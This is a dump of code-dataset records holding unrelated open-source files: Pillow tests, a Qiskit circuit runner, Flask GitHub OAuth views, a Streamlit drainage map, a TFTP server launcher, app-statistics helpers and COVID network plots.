draw_str_at_point\n\nFONT_PATH = \"/usr/share/fonts/truetype/dejavu/DejaVuSansMono.ttf\"\n\n\nclass PillowToolTest(unittest.TestCase):\n @staticmethod\n def make_image():\n return Image.new('RGBA', (256, 256), (0, 0, 127))\n\n def test_draw_str_at_point(self):\n image = self.make_image()\n draw_str_at_point(\n image,\n \"TEST_STRING\",\n (10, 10),\n font_path=FONT_PATH,\n fore_ground_color=(0, 0, 0),\n back_ground_color=(255, 255, 255)\n )\n image.save(\"_temp/draw_str_at_point.png\")\n\n def test_draw_str_at_center(self):\n image = self.make_image()\n draw_str_at_center(\n image,\n \"TEST_STRING\",\n font_path=FONT_PATH,\n fore_ground_color=(0, 0, 0),\n back_ground_color=(255, 255, 255)\n )\n image.save(\"_temp/draw_str_at_center.png\")\n\n\nif __name__ == '__main__':\n os.chdir(os.path.dirname(os.path.abspath(__file__)))\n unittest.main()\n","repo_name":"hosson/hotools","sub_path":"tests/test_pillow_tools.py","file_name":"test_pillow_tools.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41219880227","text":"import numpy as np\r\n\r\n# importing Qiskit\r\nfrom qiskit_ibm_provider import IBMProvider\r\nfrom qiskit import QuantumCircuit, ClassicalRegister, QuantumRegister, transpile, assemble\r\n\r\n#importing Mitiq\r\nfrom mitiq.zne.scaling import fold_gates_at_random\r\nfrom mitiq.interface.mitiq_qiskit import to_qasm, from_qiskit\r\n\r\ndef zz_pump(q, c, p, system, ancilla, ini):\r\n z = QuantumCircuit(q, c)\r\n if ini == \"01\":\r\n z.x(q[system[1]])\r\n elif ini == \"10\":\r\n z.x(q[system[0]])\r\n elif ini == \"11\":\r\n z.x(q[system[0]])\r\n z.x(q[system[1]])\r\n\r\n z.x(q[ancilla])\r\n z.cx(q[system[1]], q[ancilla])\r\n \r\n theta = 2 * np.arcsin(np.sqrt(p))\r\n \r\n z.cry(theta, q[ancilla], q[system[1]])\r\n \r\n z.cx(q[system[1]], q[ancilla])\r\n z.x(q[ancilla])\r\n \r\n z.measure(q[system[0]], c[0])\r\n z.measure(q[system[1]], c[1])\r\n return z\r\n\r\ndef xx_pump(q, c, p, system, ancilla, ini):\r\n xx = QuantumCircuit(q, c)\r\n if ini == \"01\":\r\n xx.x(q[system[1]])\r\n elif ini == \"10\":\r\n xx.x(q[system[0]])\r\n elif ini == \"11\":\r\n xx.x(q[system[0]])\r\n xx.x(q[system[1]])\r\n\r\n xx.x(q[ancilla])\r\n xx.cx(q[system[0]], q[ancilla])\r\n \r\n theta = 2 * np.arcsin(np.sqrt(p))\r\n xx.cry(theta, q[ancilla], q[system[0]])\r\n \r\n xx.cx(q[system[0]], q[ancilla])\r\n xx.x(q[ancilla])\r\n\r\n xx.measure(q[system[0]], 
c[0])\r\n xx.measure(q[system[1]], c[1])\r\n\r\n return xx\r\n\r\ndef zz_xx_pump(q, c, p, system, ancillae, ini):\r\n zx = QuantumCircuit(q, c)\r\n if ini == \"01\":\r\n zx.x(q[system[1]])\r\n elif ini == \"10\":\r\n zx.x(q[system[0]])\r\n elif ini == \"11\":\r\n zx.x(q[system[0]])\r\n zx.x(q[system[1]])\r\n\r\n #ZZ pump\r\n zx.x(q[ancillae[0]])\r\n zx.cx(q[system[1]], q[ancillae[0]])\r\n \r\n theta = 2 * np.arcsin(np.sqrt(p))\r\n zx.cry(theta, q[ancillae[0]], q[system[1]])\r\n \r\n zx.cx(q[system[1]], q[ancillae[0]])\r\n zx.x(q[ancillae[0]])\r\n\r\n #XX pump\r\n zx.x(q[ancillae[1]])\r\n zx.cx(q[system[0]], q[ancillae[1]])\r\n \r\n zx.cry(theta, q[ancillae[1]], q[system[0]])\r\n \r\n zx.cx(q[system[0]], q[ancillae[1]])\r\n zx.x(q[ancillae[1]])\r\n \r\n zx.measure(q[system[0]], c[0])\r\n zx.measure(q[system[1]], c[1])\r\n \r\n return zx\r\n\r\ndef rewrite_qasm(qasm_str):\r\n lines = qasm_str.split('\\n')\r\n out_lines = []\r\n measure_lines = []\r\n creg_lines = []\r\n final_output = []\r\n for line in lines:\r\n if not line.endswith(';'):\r\n out_lines.append(line)\r\n continue\r\n words = line[:-1].split(' ')\r\n if words[0] == 'measure':\r\n measure_lines.append(line)\r\n elif words[0] == 'creg':\r\n creg_lines.append(line)\r\n else:\r\n out_lines.append(line)\r\n \r\n for line in out_lines:\r\n final_output.append(line)\r\n if line.startswith('qreg'):\r\n final_output.append(f'creg c[{len(creg_lines)}];')\r\n\r\n for line in measure_lines:\r\n words = line[:-1].split(' ')\r\n qword = words[1]\r\n cword = words[3]\r\n final_output.append(f'measure {qword} -> c[{cword[4]}];')\r\n\r\n final_output.append('')\r\n\r\n return '\\n'.join(final_output)\r\n\r\nprovider = IBMProvider()\r\nbackend = provider.get_backend('simulator_statevector')\r\n\r\nshots = 20000\r\nprobs = np.linspace(0,1.0,5)\r\n\r\nwith open('mre_sim_12.txt','w') as job_id_file:\r\n pump_list = [zz_pump,xx_pump,zz_xx_pump]\r\n sys_list = [[1,2],[1,2],[1,2]]\r\n anc_list = [[0],[0],[0,3]]\r\n ini_list = ['00','01','10','11']\r\n scale_factors = [1]\r\n\r\n for scale_factor in scale_factors:\r\n circ_list = []\r\n\r\n for pump,sys,anc in zip(pump_list,sys_list,anc_list): #Loop over pump\r\n for ini in ini_list: #Loop over ini\r\n for p in probs: #Loop over prob\r\n q = QuantumRegister(4, name='q')\r\n c = ClassicalRegister(2, name='c')\r\n #Create circuit\r\n circ = pump(q, c, p, sys, anc, ini)\r\n #Transpile first pass\r\n transpiled = transpile(circ,backend=backend,optimization_level=0)\r\n #Convert to Mitiq\r\n circ_to_mitiq = from_qiskit(transpiled)\r\n #Fold circuit\r\n circ_folded_mitiq = fold_gates_at_random(circ_to_mitiq, scale_factor)\r\n #Convert to Qiskit\r\n circ_folded_qasm = to_qasm(circ_folded_mitiq)\r\n circ_folded = QuantumCircuit.from_qasm_str(circ_folded_qasm)\r\n #Transpile without optimizing\r\n transpiled_folded = transpile(circ_folded, backend=backend, optimization_level=0)\r\n circ_list.append(transpiled_folded)\r\n\r\n job = backend.run(circ_list, shots=shots) #Run job\r\n job_id_file.write(job.job_id()+'\\n') #Write to file\r\n print('Ran job with job id '+job.job_id())\r\n\r\nprint('All complete.')\r\n","repo_name":"JessicaJohnBritto/QOSF_Cohort6","sub_path":"Results_from_paper/IBMQ results/qosf_ibmq_mre.py","file_name":"qosf_ibmq_mre.py","file_ext":"py","file_size_in_byte":4969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35820170592","text":"from flask import Blueprint, Response, request, session, render_template, redirect, flash, 
url_for\nfrom app.utils import Github\nfrom app.utils import UserAuth\nfrom app.core.models import User\nfrom app.core.forms import UserSettingsForm\n\nmain = Blueprint('core', __name__,template_folder='../templates')\nuser_auth = UserAuth('core.login')\n\n@main.route('user/settings',methods=['GET', 'POST'])\n@user_auth.login_required\ndef user_settings():\n user_id = session.get('user_id')\n user = User.objects.get_or_404(id=user_id)\n\n form = UserSettingsForm(request.form, obj=user)\n \n if request.method == 'POST' and form.validate():\n form.populate_obj(user)\n user.save()\n settings = {'user': user, 'form': form}\n return render_template('core/user_settings.html', settings=settings)\n\n@main.route('login/')\ndef login():\n return render_template('core/login.html')\n\n@main.route('login/github')\ndef github_login():\n github = Github()\n client_id = github.client_id\n endpoint = 'https://github.com/login/oauth/authorize?client_id=%s&scope=user,public_repo,repo,gist'%(client_id)\n return redirect(endpoint, code=307)\n\n@main.route('callback')\ndef auth_callback():\n type_auth = request.args.get('type')\n login_url = url_for('.login')\n\n if type_auth == None:\n flash('Authentication type missing')\n return redirect(login_url, code=307)\n\n if type_auth == 'github':\n code = request.args.get('code')\n\n if code == None:\n flash('Invalid verification code')\n return redirect(login_url, code=307)\n \n github = Github()\n token = github.access_token(code)\n\n if 'error' in token:\n flash('An error has occurred: %s' % token['error'])\n return redirect(login_url, code=307)\n elif 'access_token' in token:\n if user_auth.check_or_create(token['access_token'], type_auth):\n next = session.get('requre_url')\n session.pop('requre_url', None)\n if not next:\n next = request.host_url\n return redirect(next, code=307)\n else:\n flash('unknow error')\n return redirect(login_url, code=307) \n else:\n flash('unknow error')\n return redirect(login_url, code=307)\n else:\n flash('Unknown authentication type')\n return redirect(login_url, code=307)","repo_name":"miguel250/miguelpz-core","sub_path":"app/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"42039838028","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 16 20:29:57 2020\n\n@author: tommo\n\"\"\"\n\n\nimport streamlit as st\nfrom streamlit_folium import folium_static\nimport folium\nimport geopandas as gpd\nimport pandas as pd\n\nfrom streamlit_folium import folium_static\nimport folium\nfrom pyproj import Transformer\ntransformer = Transformer.from_crs(\"epsg:27700\", \"epsg:4326\")\n\nst.markdown(\n f'''\n \n ''',\n unsafe_allow_html=True\n)\n\nst.write(\n \"\"\"\n# Drainage Info from SCANNER survey\n# \"\"\"\n)\n#with st.echo():\n\n@st.cache\ndef load_data():\n gdf_gullies = gpd.read_file('Gulleys Nov 2019/gulleys.shp')\n gdf_gullies.crs = \"EPSG:27700\"\n def transform_coords(X1,Y1):\n return transformer.transform(X1, Y1)\n \n gdf_gullies.loc[:,'X1'] = gdf_gullies.apply(lambda x: transform_coords(x['POINT_X'],x['POINT_Y'])[0], axis=1)\n gdf_gullies.loc[:,'Y1'] = gdf_gullies.apply(lambda x: transform_coords(x['POINT_X'],x['POINT_Y'])[1], axis=1)\n \n \n gdf_gullies.head()\n df = pd.read_parquet('drainage.parquet')\n df.loc[df['LCRV'] > 200,'LCRV'] = 200\n df.loc[df['LCRV'] < -200,'LCRV'] = -200\n return [df, gdf_gullies]\n\ndf, gdf_gullies = load_data()\n\ny = 
st.sidebar.selectbox(\"Road:\", df['roadcode'].unique(), index=42)\n\ndf2 = df[df['roadcode']==y]\n\nif y == 'A5':\n selected_chainage = st.slider('Chainage in m', int(df2['cumlength'].min()), int(df2['cumlength'].max()), \\\n value=(min(11670, max(0,int(df2['cumlength'].max()-1000))),min(17000, int(df2['cumlength'].max()-50))), step=10)\nelse:\n selected_chainage = st.slider('Chainage in m', int(df2['cumlength'].min()), int(df2['cumlength'].max()), \\\n value=(int(df2['cumlength'].min()), int(df2['cumlength'].max())), step=10)\n \n\nst.write('Selected chainage:', selected_chainage)\n\ndf3 = df2[(df2['SECTIONLABEL'] == 'CL1') & (df2['cumlength'] >= selected_chainage[0]) & (df2['cumlength'] <= selected_chainage[1])]\ndf4 = df2[(df2['SECTIONLABEL'] == 'CR1') & (df2['cumlength'] >= selected_chainage[0]) & (df2['cumlength'] <= selected_chainage[1])]\n\n\nimport mplleaflet\nimport matplotlib.pyplot as plt\nfig, ax = plt.subplots()\nkw1 = dict(color='blue', alpha=0.4, scale=1)\nq1 = ax.quiver(df3['X1'], df3['Y1'], df3['newU'], df3['newV'], **kw1)\ngj1 = mplleaflet.fig_to_geojson(fig=fig)\n#TODO - u,v needs to be second component relative to first stop\n\n\n\nfig, ax = plt.subplots()\nkw2 = dict(color='green', alpha=0.4, scale=1)\nq2 = ax.quiver(df4['X1'], df4['Y1'], df4['newU'], df4['newV'], **kw2)\ngj2 = mplleaflet.fig_to_geojson(fig=fig)\n\nimport folium\n\nfeature_group0 = folium.FeatureGroup(name='Left lane')\nfeature_group1 = folium.FeatureGroup(name='Right lane')\n\nnew_coords = [(df3.X1.min()+df3.X1.max())/2, (df3.Y1.min()+df3.Y1.max())/2]\n\n\n\n#new_coords = transformer.transform((coords[0]+coords[2])/2, (coords[1]+coords[3])/2)\n#def transform_coords(X1,Y1):\n# return transformer.transform(X1, Y1)\n\nmapa = folium.Map(location=new_coords, tiles=\"Cartodb Positron\",\n zoom_start=12, prefer_canvas=True)\n\nfor feature in gj1['features']:\n if feature['geometry']['type'] == 'Point':\n lat, lon = feature['geometry']['coordinates']\n div = feature['properties']['html']\n\n icon_anchor = (feature['properties']['anchor_x'],\n feature['properties']['anchor_y'])\n\n icon = folium.features.DivIcon(html=div,\n icon_anchor=icon_anchor)\n marker = folium.Marker([lat, lon], icon=icon)\n feature_group0.add_child(marker)\n else:\n msg = \"Unexpected geometry {}\".format\n raise ValueError(msg(feature['geometry']))\n\nfor feature in gj2['features']:\n if feature['geometry']['type'] == 'Point':\n lat, lon = feature['geometry']['coordinates']\n div = feature['properties']['html']\n\n icon_anchor = (feature['properties']['anchor_x'],\n feature['properties']['anchor_y'])\n\n icon = folium.features.DivIcon(html=div,\n icon_anchor=icon_anchor)\n marker = folium.Marker([lat, lon], icon=icon)\n feature_group1.add_child(marker)\n else:\n msg = \"Unexpected geometry {}\".format\n raise ValueError(msg(feature['geometry']))\n \n \nmapa.add_child(feature_group0)\nmapa.add_child(feature_group1)\n\nfeature_group2 = folium.FeatureGroup(name='Gullies at recommended spacing', show=False)\ndef plotDot(point):\n '''input: series that contains a numeric named latitude and a numeric named longitude\n this function creates a CircleMarker and adds it to your this_map'''\n #folium.CircleMarker(location=[point.Y1, point.X1],\n # radius=3,\n # weight=1).add_to(mapa)\n #folium.Marker([point['X1'], point['Y1']],\n # #Make color/style changes here\n # icon = folium.simple_marker(color='lightgray', marker_icon='oil'),\n # ).add_to(mapa)\n color_map = {'CL1':'blue','CR1':'green'}\n \n folium.Circle( [point['X1'], point['Y1']], 
radius=2\n , color=color_map[point['SECTIONLABEL']]\n , fill_color='lightgray'\n , fill=True\n ).add_to(feature_group2)\n \nfeature_group3 = folium.FeatureGroup(name='Actual gullies', show=False)\ndef plotGul(point):\n folium.Circle( [point['X1'], point['Y1']], radius=2\n , color='darkgray'\n , fill_color='black'\n , fill=True\n ).add_to(feature_group3)\n \nfeature_group4 = folium.FeatureGroup(name='Chainages', show=True)\ndef plotChain(point):\n #iframe = folium.IFrame(text, width=700, height=450)\n #popup = folium.Popup(iframe, max_width=3000)\n folium.Marker( [point['X1'], point['Y1']], radius=4\n , color='black'\n #, fill_color='#808080'\n #, fill=True\n , icon=folium.DivIcon(html=str(\"
<div>%d</div>
\" % (point['cumlength'])))#, point['LABEL'], point['STARTCH'])))\n #, popup=str(point['cumlength'])\n ).add_to(feature_group4)\n \n#use df.apply(,axis=1) to \"iterate\" through every row in your dataframe\ndf2[df2['gullymarker'] ==1].apply(lambda x: plotDot(x), axis = 1)\n\ndf2.iloc[1::20].apply(lambda x: plotChain(x), axis = 1)\n#if df3.shape[0] > df4.shape[0]:\n# df3.iloc[1::10].apply(lambda x: plotChain(x), axis = 1)\n#else:\n# df4.iloc[1::10].apply(lambda x: plotChain(x), axis = 1)\n\ngdf_gullies.apply(lambda x: plotGul(x), axis = 1)\n\nmapa.add_child(feature_group2)\nmapa.add_child(feature_group3)\nmapa.add_child(feature_group4)\nmapa.add_child(folium.map.LayerControl())\n\nfrom folium.plugins import LocateControl\nLocateControl().add_to(mapa)\n\nfolium_static(mapa)\n\nimport matplotlib.pyplot as plt\ndef plotsir(t, S, I, R, add_text):\n f, ax = plt.subplots(1,1,figsize=(10,4))\n ax.plot(t, S, 'b', alpha=0.7, linewidth=2, label='Crossfall')\n ax.plot(t, I, 'y', alpha=0.7, linewidth=2, label='Gradient')\n #ax.plot(t, R, 'g', alpha=0.7, linewidth=2, label='Radius')\n\n ax.set_xlabel('Chainage (m) - ' + add_text)\n ax.set_ylabel('%') # we already handled the x-label with ax1\n ax2 = ax.twinx()\n color = 'tab:blue'\n ax2.set_ylabel('Radius (m)', color=color) # we already handled the x-label with ax1\n #ax2.set_yscale(\"log\")\n ax2.plot(t, R, alpha=0.4, color=color,label='Radius')\n ax2.tick_params(axis='y', labelcolor=color)\n\n ax.yaxis.set_tick_params(length=0)\n ax.xaxis.set_tick_params(length=0)\n ax.grid(b=True, which='major', c='w', lw=2, ls='-')\n legend = ax.legend()\n legend.get_frame().set_alpha(0.5)\n for spine in ('top', 'right', 'bottom', 'left'):\n ax.spines[spine].set_visible(False)\n st.sidebar.pyplot(f)\n\nplotsir(df3['cumlength'], df3['LFAL'], df3['LGRD'], df3['LCRV'], \"LEFT LANE\")\nplotsir(df4['cumlength'], df4['LFAL'], df4['LGRD'], df4['LCRV'], \"RIGHT LANE\")","repo_name":"tomcreer/streamlitdrainage","sub_path":"streamlit_drainage.py","file_name":"streamlit_drainage.py","file_ext":"py","file_size_in_byte":8170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"43103528588","text":"import json\n\n# the latest code of tftpy on Github fixes \"bad file path\" problem on windows\n# but the latest version 0.8.1 on pip doesn't.\n# so i'm directly using this package without pip temporarily\nimport tftpy\n\n\ndef start_tftp_server(path: str, ip: str, port: int):\n server = tftpy.TftpServer(path)\n server.listen(ip, port)\n\n\nif __name__ == \"__main__\":\n with open(\"../properties.json\", \"r\") as fp:\n properties = json.load(fp)\n\n start_tftp_server(\n properties['path'],\n properties['server_ip'],\n properties['tftp_port']\n )\n","repo_name":"mpraiser/js9331_update","sub_path":"js9331_update/tftp_server.py","file_name":"tftp_server.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"9141318254","text":"class Mapping_data:\n \n def mean_price_dict(self):\n price_mean_for_each_category = category_elements['Price'].agg(np.mean)\n price_mean_for_each_category_dict = dict(price_mean_for_each_category)\n return price_mean_for_each_category_dict\n \n def mean_downloads_dict(self):\n installs_mean_for_each_category = category_elements['Installs'].agg(np.mean)\n installs_mean_for_each_category_dict = dict(installs_mean_for_each_category)\n return installs_mean_for_each_category_dict\n \n def 
mean_reviews_dict(self):\n reviews_mean_for_each_category = category_elements['Reviews'].agg(np.mean)\n reviews_mean_for_each_category_dict = dict(reviews_mean_for_each_category)\n return reviews_mean_for_each_category_dict\n \n def mean_rating_dict(self):\n rating_mean_for_each_category = category_elements['Rating'].agg(np.mean)\n rating_mean_for_each_category_dict = dict(rating_mean_for_each_category)\n return rating_mean_for_each_category_dict\n \n def full_rated_apps_dict(self):\n fully_rated_rows = appsData[appsData.Rating==5]\n fullyRatedAppsInCategory = {}\n for i in fully_rated_rows.Category:\n if fullyRatedAppsInCategory.__contains__(i):\n fullyRatedAppsInCategory[i] = fullyRatedAppsInCategory[i] + 1;\n else:\n fullyRatedAppsInCategory[i] = 1;\n fullyRatedAppsInCategory_per = {}\n for i in fully_rated_rows.Category:\n fullyRatedAppsInCategory_per[i] = round(((fullyRatedAppsInCategory[i]\n /no_of_apps_in_category[i])*100), 2)\n return fullyRatedAppsInCategory_per\n \n def apps_rated_below_four_dict(self):\n rating_below_four_in_rows = appsData[appsData.Rating<4]\n below_four_RatedAppsInCategory = {}\n for i in rating_below_four_in_rows.Category:\n if below_four_RatedAppsInCategory.__contains__(i):\n below_four_RatedAppsInCategory[i] = below_four_RatedAppsInCategory[i] + 1;\n else:\n below_four_RatedAppsInCategory[i] = 1;\n below_four_RatedAppsInCategory_per = {}\n for i in category_of_apps:\n below_four_RatedAppsInCategory_per[i] = round(((below_four_RatedAppsInCategory[i]\n /no_of_apps_in_category[i])*100), 2)\n \n return below_four_RatedAppsInCategory_per\n\n def more_than_1M_reviews_dict(self):\n more_than_one_million_reviews = appsData[appsData.Reviews>=1000000]\n more_than_one_million_reviews_in_category = {}\n for i in more_than_one_million_reviews.Category:\n if more_than_one_million_reviews_in_category.__contains__(i):\n more_than_one_million_reviews_in_category[i] = more_than_one_million_reviews_in_category[i] + 1;\n else:\n more_than_one_million_reviews_in_category[i] = 1;\n more_than_one_million_reviews_in_category_per = {}\n for i in more_than_one_million_reviews_in_category:\n more_than_one_million_reviews_in_category_per[i] = round(((more_than_one_million_reviews_in_category[i]/\n no_of_apps_in_category[i])*100), 2)\n return more_than_one_million_reviews_in_category_per\n \n def more_than_1M_downloads_dict(self):\n more_than_one_million_downloads = appsData[appsData.Installs>=1000000]\n more_than_one_million_downloads_in_category = {}\n for i in more_than_one_million_downloads.Category:\n if more_than_one_million_downloads_in_category.__contains__(i):\n more_than_one_million_downloads_in_category[i] = more_than_one_million_downloads_in_category[i] + 1;\n else:\n more_than_one_million_downloads_in_category[i] = 1;\n more_than_one_million_downloads_in_category_per = {}\n for i in category_of_apps:\n more_than_one_million_downloads_in_category_per[i] = round(((more_than_one_million_downloads_in_category[i]\n /no_of_apps_in_category[i])*100), 2)\n return more_than_one_million_downloads_in_category_per\n \n def free_apps_dict(self):\n group_apps_by_category = {}\n for i in category_of_apps:\n group_apps_by_category[i] = appsData[appsData.Category == i]\n no_of_free_apps_in_category = {}\n free = 0\n for i in category_of_apps:\n free = 0\n for j in group_apps_by_category[i].Type:\n if j == \"Free\":\n free+=1\n no_of_free_apps_in_category[i] = free\n no_of_free_apps_in_category_per = {}\n for i in no_of_free_apps_in_category:\n no_of_free_apps_in_category_per[i] = 
round(((no_of_free_apps_in_category[i]\n /no_of_apps_in_category[i])*100), 2) \n return no_of_free_apps_in_category_per\n \n def paid_apps_dict(self):\n group_apps_by_category = {}\n for i in category_of_apps:\n group_apps_by_category[i] = appsData[appsData.Category == i]\n no_of_paid_apps_in_category = {}\n paid = 0\n for i in category_of_apps:\n paid = 0\n for j in group_apps_by_category[i].Type:\n if j == \"Paid\":\n paid+=1\n no_of_paid_apps_in_category[i] = paid \n no_of_paid_apps_in_category_per = {}\n for i in no_of_paid_apps_in_category:\n no_of_paid_apps_in_category_per[i] = round(((no_of_paid_apps_in_category[i]\n /no_of_apps_in_category[i])*100), 2)\n return no_of_paid_apps_in_category_per\n\n","repo_name":"hidden-tesla/play_store_apps_analysis","sub_path":"Python file/Mapping_data.py","file_name":"Mapping_data.py","file_ext":"py","file_size_in_byte":5855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"19284022440","text":"PRINT = \"Print\"\nINPUT = \"Input\"\nIF = \"Branch\"\n\nWINDOW_NEW = \"창 만들기\"\n# WINDOW_DESTROY = \"Destroy Window\"\nDRAW_TEXT = \"화면에 글��기\"\nSCREEN_CLEAR = \"화면 지우기\"\nDRAW_IMAGE = \"단일 이미지 그리기\"\nDRAW_GROUP = \"스프라이트 그룹 그리기\"\n\nKEY_INPUT = \"키가 눌려있을 때\"\nKEY_NOT_INPUT = \"키가 눌려있지 않을 때\"\nENTRY_POINT = \"시작했을 때\"\nDETECT_COLLISION = \"스프라이트 충돌 때\"\n\nVARIABLE_NEW = \"새 변수\"\nVARIABLE_DEFINE = \"변수 값 정하기\"\nVARIABLE_PLUS = \"변수 값 바꾸기\"\nADD_GROUP = \"스프라이트 묶음\"\nDEFINE_CHARACTER = \"오브젝트 정의하기\"\nPYTHON_NATIVE = \"사용자 지정\"\n\n# ================================================================================================== #\n\n\nALL_VARIABLE_NAME = dir()[0:-8]\n# print(ALL_LEAF_TYPES)\n\nGetNameFromStr = {}\nfor i in range(len(ALL_VARIABLE_NAME)):\n GetNameFromStr[locals()[ALL_VARIABLE_NAME[i]]] = ALL_VARIABLE_NAME[i]\n\nALL_LEAF_TYPES = []\nfor _LEAF_TYPE in ALL_VARIABLE_NAME:\n ALL_LEAF_TYPES.append(locals()[_LEAF_TYPE])\n\n# print(ALL_LEAF_TYPES)\n# print(GetNameFromStr)\n","repo_name":"tdh8316/Guico","sub_path":"contents/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"ko","doc_type":"code","stars":21,"dataset":"github-code","pt":"60"} +{"seq_id":"4714221091","text":"import os\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport numpy as np\r\nimport subprocess\r\nsubprocess.call(['pip', 'install', 'networkx'])\r\nimport networkx as nx\r\n\r\ndef plotting_infections_isolations():\r\n '''\r\n This function creates a visual representation of the COVID-19 Infections and Isolations CSV file\r\n '''\r\n # getting current directory, should be the same where model and the csv file were saved\r\n current_dir = os.getcwd()\r\n # create a folder to store plots\r\n folder_name = 'graphs'\r\n if not os.path.exists(os.path.join(current_dir, folder_name)):\r\n os.mkdir('graphs')\r\n else:\r\n pass\r\n # csv file name\r\n filename = \"Isolation_And_Infection_counts.csv\"\r\n full_path = os.path.join(current_dir, filename)\r\n # get the path to store a generated graph\r\n store_path = os.path.join(current_dir, 'graphs/' + 'COVID-19_infections_and_isolations_graph.png')\r\n df = pd.read_csv(full_path)\r\n np.random.seed(42)\r\n df['date'] = list(pd.date_range('2022-09-26', periods=len(df), freq='D'))\r\n # Create a figure and axis object\r\n fig, ax = plt.subplots(figsize=(12, 6))\r\n # Plot the number of infected people over time\r\n ax.plot(df['date'], df['number_infected'], label='Infected')\r\n # Plot 
the number of people in isolation over time\r\n ax.plot(df['date'], df['number_isolating'], label='Isolating')\r\n # Calculate the percentage of people in isolation\r\n pct_isolating = df['number_isolating'] / df['number_infected'] * 100\r\n # Plot the dotted line representing the percentage of people in isolation\r\n ax.plot(df['date'], pct_isolating, label='% Isolating', linestyle='--')\r\n # Set x-axis label and title\r\n ax.set_xlabel('Date')\r\n ax.set_title('COVID-19 Infections and Isolations')\r\n # Set y-axis label and legend\r\n ax.set_ylabel('Number of People')\r\n ax.legend()\r\n # Show the plot\r\n # plt.show()\r\n plt.savefig(store_path)\r\n\r\ndef plotting_community_network():\r\n '''\r\n This function creates a visual representation of a community network of spreaders and infected people across different faculties\r\n '''\r\n # getting current directory, should be the same where model and the csv file were saved\r\n current_dir = os.getcwd()\r\n # csv file name\r\n filename = \"Infections_ID.csv\"\r\n full_path = os.path.join(current_dir, filename)\r\n # get the path to store a generated graph\r\n store_path = os.path.join(current_dir, 'graphs/' + 'community_network_graph.png')\r\n df = pd.read_csv(full_path)\r\n np.random.seed(42)\r\n num_top_spreaders = int(input(\"Enter the number of top spreaders you want to be displayed: \"))\r\n df['date'] = list(pd.date_range('2022-09-26', periods=len(df), freq='D'))\r\n # calculate the number of times each spreader appears in the dataset\r\n spreader_counts = df['Spreader_id'].value_counts()\r\n\r\n # pick the most common spreaders from user input\r\n top_spreaders = spreader_counts[:num_top_spreaders].index.tolist()\r\n\r\n # create a graph\r\n G = nx.Graph()\r\n\r\n # add nodes for each spreader and set their size according to the number of infections they caused\r\n for spreader in top_spreaders:\r\n size = spreader_counts[spreader] / 10\r\n G.add_node(spreader, size=size)\r\n\r\n # add edges between spreaders and infected people\r\n for _, row in df.iterrows():\r\n if row['Spreader_id'] in top_spreaders:\r\n G.add_edge(row['Spreader_id'], row['Infected_id'])\r\n\r\n # add node color based on faculty\r\n faculty_colors = {'computing': 'red', 'science': 'blue', 'business': 'green'}\r\n # create a list of node colors based on the faculty of the spreader\r\n node_color_map = []\r\n for node in G.nodes:\r\n if node in df['Spreader_id'].values:\r\n color = faculty_colors.get(df.loc[df['Spreader_id']==node, 'Spreader_faculty'].iloc[0], 'gray')\r\n else:\r\n color = 'gray'\r\n node_color_map.append(color)\r\n\r\n # create a list of node sizes based on the degree of each node\r\n node_size = [deg*100 for node, deg in G.degree()]\r\n\r\n # check that the node size list has the same length as the node color list\r\n if len(node_size) != len(node_color_map):\r\n raise ValueError(\"node_size and node_color_map must have the same length\")\r\n\r\n # draw the graph\r\n pos = nx.spring_layout(G, k=0.3)\r\n nx.draw_networkx_nodes(G, pos, node_size=node_size, node_color=node_color_map)\r\n nx.draw_networkx_edges(G, pos, alpha=0.5)\r\n nx.draw_networkx_labels(G, pos, font_size=8, font_family='sans-serif')\r\n\r\n # add a legend showing what the colors represent\r\n legend = []\r\n for faculty, color in faculty_colors.items():\r\n legend.append(plt.Line2D([], [], color=color, marker='o', markersize=5, label=faculty))\r\n plt.legend(handles=legend)\r\n\r\n # set the axis limits and show the graph\r\n plt.xlim([-1.2,1.3])\r\n plt.ylim([-1.2,1.3])\r\n 
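# spring_layout() scales node positions into roughly [-1, 1]; the padded limits above keep labels from being clipped\r\n    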
plt.axis('off')\r\n plt.title('Spreaders and Infected People Community Detection')\r\n #plt.show()\r\n # Save the graph as a PNG file\r\n plt.savefig(store_path)\r\n\r\nif __name__ == '__main__':\r\n\tprint('Creating visual representation of the model\"s performance')\r\n\tplotting_infections_isolations()\r\n\tplotting_community_network()\r\n\tprint('Created. Graphs are contained in the folder graphs.')\r\n\r\n","repo_name":"swiatej/abm-covid-spread","sub_path":"visualisation.py","file_name":"visualisation.py","file_ext":"py","file_size_in_byte":5150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18013094205","text":"## Return the number of times that the string \"code\"\r\n## appears in the given string, except we will accept\r\n## any letter for the 'd', so \"cope\" and \"cooe\" count.\r\n\r\ndef count_code(str):\r\n count = 0\r\n for i in range(len(str)):\r\n if str[i:i+2]==\"co\" and str[i+3:i+4]==\"e\":\r\n count = count + 1\r\n return count\r\n\r\nprint(count_code(\"aaacodebbb\"))\r\nprint(count_code(\"codexxxcode\"))\r\nprint(count_code(\"cozexxxxcope\"))\r\n","repo_name":"sayak-3848/codingbat","sub_path":"String2/count_code.py","file_name":"count_code.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21929279598","text":"from typing import List\n\nfrom dash import html\nfrom dash_spa import register_page, prefix, trigger_index\n\nfrom dash_spa.spa_context import createContext, ContextState, dataclass\nfrom dash_spa.components import DropdownAIO, ButtonContainerAIO\n\nfrom .icons import ICON\n\npage = register_page(__name__, path='/', title=\"Button Test\", 